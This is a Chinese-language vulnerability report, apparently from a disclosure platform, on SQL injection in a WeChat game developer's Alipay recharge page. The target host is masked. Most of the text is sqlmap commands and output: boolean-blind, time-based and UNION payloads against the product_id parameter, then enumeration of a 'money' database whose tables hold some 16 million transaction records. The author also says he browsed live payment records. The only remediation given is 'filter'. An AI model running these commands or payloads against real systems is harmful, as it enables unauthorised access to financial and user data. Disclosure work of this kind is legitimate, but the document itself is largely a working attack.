游光网络爱微游平台某处SQL注入可UNION(泄漏1600万交易记录)
RT
http://**.**.**.**/
游光网络是微信游戏比较火的开发商,允许微信不用注册直接登录玩,目前比较火的游戏有 怪兽必须死 勇士之塔 三国浮生记 都允许用微信直接支付充值 我查看了一下交易记录 每一秒都有7/8单充值记录 虽然都是小金额2块5块,但是一天下来收入统计还是很可观
注入点在web充值页面
http://**.**.**.**/pay/alipay2/
?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8
放sqlmap跑
sqlmap -u 'http://**.**.**.**/pay/alipay2/
?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id'
_
___ ___| |_____ ___ ___ {**.**.**.**#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:46:06
[20:46:07] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:46:08] [INFO] resuming back-end DBMS 'mysql'
[20:46:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- -
---
[20:46:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
sqlmap -u 'http://**.**.**.**/pay/alipay2/
?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id' -D money --tables --count
_
___ ___| |_____ ___ ___ {**.**.**.**#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:47:00
[20:47:00] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:47:01] [INFO] resuming back-end DBMS 'mysql'
[20:47:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- -
---
[20:47:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[20:47:01] [INFO] fetching tables for database: 'money'
[20:47:01] [INFO] the SQL query used returns 19 entries
[20:47:01] [INFO] resumed: channel_tradeno
[20:47:01] [INFO] resumed: cp_trans
[20:47:01] [INFO] resumed: distr_stat
[20:47:01] [INFO] resumed: distr_sum
[20:47:01] [INFO] resumed: game_v2
[20:47:01] [INFO] resumed: marchant
[20:47:01] [INFO] resumed: mch_func_priv
[20:47:01] [INFO] resumed: mch_games
[20:47:01] [INFO] resumed: mch_priv
[20:47:01] [INFO] resumed: online
[20:47:01] [INFO] resumed: product_sum
[20:47:01] [INFO] resumed: product_v2
[20:47:01] [INFO] resumed: register
[20:47:01] [INFO] resumed: sum
[20:47:01] [INFO] resumed: talking_data_result
[20:47:01] [INFO] resumed: trans
[20:47:01] [INFO] resumed: trans_back
[20:47:01] [INFO] resumed: user_channel_sum
[20:47:01] [INFO] resumed: user_channel_trans
Database: money
[19 tables]
+---------------------+
| sum |
| channel_tradeno |
| cp_trans |
| distr_stat |
| distr_sum |
| game_v2 |
| marchant |
| mch_func_priv |
| mch_games |
| mch_priv |
| online |
| product_sum |
| product_v2 |
| register |
| talking_data_result |
| trans |
| trans_back |
| user_channel_sum |
| user_channel_trans |
+---------------------+
[20:47:01] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
Database: money
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| trans | 16486615 |
| trans_back | 14759999 |
| online | 7397218 |
| cp_trans | 113319 |
| product_sum | 27005 |
| `sum` | 15403 |
| talking_data_result | 11257 |
| user_channel_sum | 3924 |
| distr_sum | 2431 |
| channel_tradeno | 1776 |
| product_v2 | 687 |
| distr_stat | 571 |
| mch_games | 150 |
| game_v2 | 89 |
| marchant | 78 |
| register | 45 |
| mch_priv | 5 |
| mch_func_priv | 1 |
+---------------------+---------+
1600W交易记录
解决方案:
过滤